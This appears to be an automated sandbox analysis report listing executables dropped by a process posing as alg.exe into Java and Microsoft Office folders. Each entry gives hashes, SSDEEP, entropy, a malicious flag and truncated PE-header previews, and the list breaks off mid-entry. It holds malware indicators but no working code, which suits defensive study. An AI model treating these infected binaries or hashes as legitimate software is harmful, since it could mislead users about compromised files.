                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................q.......................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1142272
                                                                                                                                                Entropy (8bit):5.032988606726022
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:bKl2Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:eUsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:77131FDDFA3464A6195A37D61F7F9C90
                                                                                                                                                SHA1:8B83F3846F34A1D63D0F7926AAF68C2E8F5A8089
                                                                                                                                                SHA-256:C5B2BFBECF6F308C90059414645968A3B2393C347D6401FFFB1C22BC3B5781C8
                                                                                                                                                SHA-512:A59FAF0777F855612EF710F19B0D2273806BE64081E47B5EAD248503A936770A763D52408572D1646DFDF759BBC82501F3F24D1B4AEFA8FC72E447B629ED52BF
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................;.......................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1142272
                                                                                                                                                Entropy (8bit):5.032994306009622
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:Nil2Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:wUsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:97311C6C5B039CA66321B36A0D50AE90
                                                                                                                                                SHA1:01A3FC90870F31982AA65D690B58E3C20AFD03FE
                                                                                                                                                SHA-256:FB27AEEAFFFC4C309357DF28D22DD6BE89B836AA0E1CFFAE8BF779E961019C1B
                                                                                                                                                SHA-512:D8C05A102783020A10B6C3A1259CD311291AC7D3E4A9817B9497F5BE92A459609492C8AB53BB1DC0013D25F9A9313BF619EF07C331293EA54A80A34276DB3EA7
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................{........................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1142272
                                                                                                                                                Entropy (8bit):5.0329676246506665
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:YTmWXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:y/sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:EC68C9CF7E0B392CA514C5D8C4D3FBB8
                                                                                                                                                SHA1:DF47BA633BD21937F034EACE576E14BE9DAB0C79
                                                                                                                                                SHA-256:FC275C3813B7756A20777A1D14733C9B10D9C8B2A4A7AFA967F796D5E5EE4438
                                                                                                                                                SHA-512:8A2F38F104BFB4550B0EC12508DE7EAF4ABAF09015BEDFB9B9300489B98F5464D6D2105FD2400108C628F70C546B42AB9AD28D1364DEE906A433E3414634F352
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................8........................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1142272
                                                                                                                                                Entropy (8bit):5.033882385629566
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:AamSXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:nTsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:3974FBBF22DE5A207EA2128919D90CB9
                                                                                                                                                SHA1:03AEBC59550D0D07496A47BFEB377166940DB2F2
                                                                                                                                                SHA-256:F92CDB6476AB1489F68D1949653A1C671A9864DECDF1C59D14EA30549BC93FD0
                                                                                                                                                SHA-512:BAF660B7F01CB0BF9DEAAC6A003B381E385299F74EED67372416A239E620AA16BF124972528BCA175E1808890F76460FD32E12D0FBFF8F81B36F20E261E8A2E0
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.........................................................................D'.......@..P........................... #..T...........................`"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1142272
                                                                                                                                                Entropy (8bit):5.032939548245491
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:wQ5uXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:/AsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:0292F4340543E352E121A5F6AE9DFCC0
                                                                                                                                                SHA1:16BB13D9FE861F61C02D68BD37A9923B67ED1983
                                                                                                                                                SHA-256:990C9BF04067E1223F0F37374A919ACCA28708A5738F0CE7060B3CCBBE2DBEDF
                                                                                                                                                SHA-512:C00974C31145EDB4AB125DB6668B0416D66662202D53DD9383F8ED314B4E4710E1661DA31CE0B54A3E91C5BEE5CBB764A5875459C8544D1F1A71B584FC5687E4
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1142272
                                                                                                                                                Entropy (8bit):5.032972695543292
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:FV/2Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:n+sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:4C7A9CA296BC3DC05799C5A054D4AC93
                                                                                                                                                SHA1:A57C00760A74D97E101F0136F532973903A257AD
                                                                                                                                                SHA-256:83FBE164A78C206F711219BEB481EC2D432E434BB4A260618FE506729AEC18D5
                                                                                                                                                SHA-512:9626F2B0B07D49C84D186EC6F5591D88B1A78129A627D63DAEF55EE634DCCEE20B2F002AD433634F469FF0995A54397D53669FBE6E799325C47D354F0D3F0F02
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1142272
                                                                                                                                                Entropy (8bit):5.032865086368631
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:nZmGXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:Z/sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:24701A353A327AEA0E0367A5C087CCAB
                                                                                                                                                SHA1:93E272CC712E544AB1A8A87D3791DE9275184E99
                                                                                                                                                SHA-256:313FAA2E69AF5F2961D0DA8712DE272EEBE907555A87BA6699243E855D4FB757
                                                                                                                                                SHA-512:F2D8F076D5CB09DA843A0A0F7439FBEB98F2A35536836541FD1743C5F1C4E7D323C3819A4ECB9D6E75F80FC70FC9BF3839647FC1D634FD0AA4D4EC02482241A8
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................f........................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1142272
                                                                                                                                                Entropy (8bit):5.032924380643697
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:HeSOXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:+7sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:E799480448164BD8C6B6B5779171158F
                                                                                                                                                SHA1:D900DB7CC332526C0A7E1E45C4652A8A6A522BA2
                                                                                                                                                SHA-256:D9F69DF91E757ACCE570E2FEDB90B2982A52A88EB76DCD21DBE9EDE5BDF74615
                                                                                                                                                SHA-512:23C245B88D4C5ECF2A97E560FC631F225F78F45F0BFEB3959F6A3D13BF22434AA74CF5D7937AFF3BF29DCB8DD0A4B1F3C421A623D481BDF96FF9F0E8274EA096
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1142272
                                                                                                                                                Entropy (8bit):5.032988434496137
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:p5/2Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:X+sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:08EEBCD1C3CC16D349B64B7BF4145461
                                                                                                                                                SHA1:850F4AE78D29C017DD131541441C4362993A468E
                                                                                                                                                SHA-256:120DDAD61D1B0FEC8F4F75AD1EF03F32F261C7EB5DDCC213DDD276CE7279DD52
                                                                                                                                                SHA-512:2D2926365F520A15FB6EA81001B870D89D19F0A13A72C65168D587DDFD48FCD8BFD10192C6815AAE47BDD0A9F50E712065E70132DC6625705165D46BFEC4F01D
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................V........................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1202688
                                                                                                                                                Entropy (8bit):5.098063756161126
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:Q7gXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:Q7gsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:DB80AD300EDC95968247B704996BD9B8
                                                                                                                                                SHA1:EBE15F2F327AC2064681EBD94EB8D5AFD08CF164
                                                                                                                                                SHA-256:3F997039703D4B541A817DFF4649DFA93E99C0829B31A0542AE45132DF217E2C
                                                                                                                                                SHA-512:73A5AFE2B15F1F0444E49E27137A46B3487051AE8F4D7C1B39DF829360FBD9C060E609C02454542C4BBFE872699E0E1FEF9C0331A34B99A3DCA16267B0D62231
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zGG.>&).>&).>&).7^..*&).\^(.<&).\^-.3&).\^*.=&).*M-.?&).*M(.7&).>&(.&).\^,..&)._,.:&)._..?&)._+.?&).Rich>&).........PE..L...M.d.................|...........u............@.................................8...........................................@....0..............................H...T...............................@...............P...P........................text...L{.......|.................. ..`.rdata.............................@..@.data........ ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1142784
                                                                                                                                                Entropy (8bit):5.0323307195846905
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:UKQCXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:pdsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:A3B55563678F6333F15DD3C711DC9F37
                                                                                                                                                SHA1:59EC392562352AD124D20EC3C3A52A6A48A7AA9C
                                                                                                                                                SHA-256:C0727C3473141D80FD42F4B7E00A0DDC46EC9955D9B8C5C6ED719ABF9534BAF6
                                                                                                                                                SHA-512:D62EDEC9487E37BFC044C8A50FEFD2AD0F8F31D49D8E128CB07280955A10F3C6B214964FADA578F23C64372F6CD6CDDB558117C51973DAB068F146CA0189FC44
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................... ............... ....@..........................................................................'.......@..h...........................8#..T...........................x"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....rsrc...h....@.......$..............@..@.reloc...P...P...@...0..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1298944
                                                                                                                                                Entropy (8bit):5.249111399766614
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:4i7l/3roAEsqjnhMgeiCl7G0nehbGZpbD:rl/roAgDmg27RnWGj
                                                                                                                                                MD5:4228B587F0411752E1638AD29342006D
                                                                                                                                                SHA1:3081366C708355EA2984575E5F57DD2626E06C27
                                                                                                                                                SHA-256:EB97D7A14EB2CC34C8A6E175B9C850E814C479C8FE2CD992494CB09CFD035B2E
                                                                                                                                                SHA-512:6A318F9608C34B455162AE25FCEF1E187D05893D6C2358DA7D44FBA32364AED56E26C70229D598E93E02DBC6EBC7629AB950EE1F207DE759561814D0C2E0D764
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...........................................................................................Rich............................PE..L.....d............................A.............@..........................0.........................................................D............................e..8............................e..@............................................text...D........................... ..`.rdata..5...........................@..@.data................f..............@....idata...............v..............@..@.00cfg..............................@..@.rsrc...D...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1269248
                                                                                                                                                Entropy (8bit):5.282056179727992
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:n5bfQnMXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:nNfQnMsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:24502D059DFB7BEB0E2C0788672FDFEC
                                                                                                                                                SHA1:7DD6798F1993D86C950E18433F61B0B2BDEE1913
                                                                                                                                                SHA-256:FEBFCB0F78BB669AC4501236ABE6658F90ECEB29C851E668A81EF6DCA123642F
                                                                                                                                                SHA-512:1C98FD76C2737A5F7DC184D688BC256CBB5611F69C7650CCF60D41B72B6EBB3776D5A6CB29259E8A4CBA4986609277DA800FE34677F569A5F9CA1DF92E52B0A1
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.u.....................|.......|.......|.......|...?.......................................y.......y.......y.......Rich............................PE..L...-1.e............... ..........................@........................................................................d...........................................8...............................@...............,............................text............................... ..`.rdata..4a.......b..................@..@.data........ ......................@....reloc...`...@...P..................@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1287680
                                                                                                                                                Entropy (8bit):5.298512952008668
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:9Nmt0LDILi21XXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:YLi4sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:3ED99541B4DD248AC267B5C6F819E00E
                                                                                                                                                SHA1:D8D4B7F09365DA6D8B65666086473DA951FE7618
                                                                                                                                                SHA-256:74D36941264A6892173C5A53A1507538F490E064AFA6BA34DD2D00F94F601C4F
                                                                                                                                                SHA-512:8DB1CAF38F0961CD2ECF74A4E9F1E28D298A579DE9268BD2665534EAED27F506412054DE44A7DC557C3C52EA84188DA1D985B2ABB371770A211DEC751DF65D12
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@.................................)............ ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1287680
                                                                                                                                                Entropy (8bit):5.298513071700569
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:gNmt0LDILi21XXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:PLi4sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:385C2A09F7C83B86F2BC9F9C7CF4510E
                                                                                                                                                SHA1:228CF4F74BECA7C4F0DC0B3C1FB37EEC13DC5B94
                                                                                                                                                SHA-256:E7532C16B5EDDAB5CCC9883556AA58C9899907896C8BCCBCC7A3EA6F0C08A02C
                                                                                                                                                SHA-512:1FA7882CB35A3DA9465916E451531D0FD0DE86739D4F3D671C4731FF2EBB897F0BBD0BFB1C18B7BAA51FEF8D076B5FF8FC762E1BDBF013F7F07FB1EAAC7B593B
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@.................................O............ ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1343488
                                                                                                                                                Entropy (8bit):5.232151150439507
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:pjuozQMGNUbTUXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:Rf4sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:75E0A8C8836098C821A16E061E0EB63C
                                                                                                                                                SHA1:5246E913EDB17652192FD32410D83EBF7F3C5FA8
                                                                                                                                                SHA-256:43B2D0E150460BD7ED282495A7D9A0D60D85C7C5204D701711C3F16F7D16818D
                                                                                                                                                SHA-512:888EFAD64E76A0B6F9A50E6E3AA79F7B7500EC8981F80BEEC0F95CE3438132E645FB2A4379999B87844BCF373A076D8246769117FE9125B22CDCD6CAAC2F0156
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .(.d.F.d.F.d.F.m..l.F...B.h.F...E.`.F...C.{.F...G.c.F.d.G...F...N.M.F.....f.F.....e.F...D.e.F.Richd.F.................PE..d....~0/.........."..........P.................@.......................................... .......... ...................................... ........ ..(...............................T....................e..(...`d..8............e...............................text............................... ..`.rdata..............................@..@.data...@...........................@....pdata..............................@..@.rsrc...(.... ......................@..@.reloc...p...0...`... ..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1496064
                                                                                                                                                Entropy (8bit):5.573983617667113
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:UbUO42i/EJsqjnhMgeiCl7G0nehbGZpbD:UJNDmg27RnWGj
                                                                                                                                                MD5:58A674D4247C2A6D38D64C56F8292816
                                                                                                                                                SHA1:D8EEC80D4BFDE016E212CAFDBF1C9982EBB4CAEF
                                                                                                                                                SHA-256:E7C135C74AC0AF98E50594D1454B5048DA8AEE5C4948EAB0E0F64C911AA1B746
                                                                                                                                                SHA-512:23D812F38E0C81BB98A5260FB9393A2EB3098767B69921E56F2E3FCE3738DAE1A6A0F4D9CC5C9AFD573E8DDFC2F236555A9CD59F88887292FBC3F0BF011754A4
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..i.v.:.v.:.v.:...;9v.:...;.v.:...;.v.:.v.:.v.:...;$v.:...;4v.:...:.v.:...;.v.:Rich.v.:........................PE..L......m.................0...|...............@....@.......................... .......F........... ......................................................................T...................`[..........@............p...............................text...l/.......0.................. ..`.data...@'...@.......4..............@....idata..@....p.......L..............@..@.c2r.................\...................rsrc................^..............@..@.reloc...........p...d..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):52712960
                                                                                                                                                Entropy (8bit):7.961801685830636
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1572864:mLjL44lyBc+UN0qRsMjDAY9d5o/paLXzHLe:qicZmsR3Lo/cnLe
                                                                                                                                                MD5:21C32D190F7E0D4CE06260F4168F19D5
                                                                                                                                                SHA1:B3331692EDE65D89A7A31DCB4CC1F88A08EF8FDE
                                                                                                                                                SHA-256:1EC577B69E7814FDFE7647EB4D849618ED90DFD3522096134468C30A234C2E34
                                                                                                                                                SHA-512:9E985C7A718170BB81ADB67129CDE017D8925CFA273E91ABE9BF1F43C8407DD462436765F057220668A8B57393427851D6C3C39EAE3ABD8D59BF6EFA0B19A32B
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......LN.../nB./nB./nB.]mC./nB.]kC./nB.TjC./nB.TmC./nB.TkC}/nB.FjC./nB.FkC3/nB.]hC./nB.]jC./nB.]oC?/nB./oBq-nB.TgC./nB.TkC./nB.TnC./nB.T.B./nB.TlC./nBRich./nB........................PE..L...1~............"....!.j(.........p]........(...@...........................$.....h.$..............................l3..t....3.0.....6.X............................./.p...................../.....h./.@.............(......j3.`....................text...jh(......j(................. ..`.rdata........(......n(.............@..@.data...t.... 4.......4.............@....didat..$.....5.......5.............@....rsrc...X.....6.......5.............@..@.reloc... ...........F..............@...................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4993536
                                                                                                                                                Entropy (8bit):6.810213444982424
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:98304:ilkkCqyDEY7+o3OBvfGVY+40ya8yS+9s/pLcD527BWG:0kkCqaE68eV+0ynE6LcVQBWG
                                                                                                                                                MD5:E839E87EC2C0E9869D1F69B45FA8F563
                                                                                                                                                SHA1:638F79017BF4ED0F85C805D70D4A426AAE0C9DE3
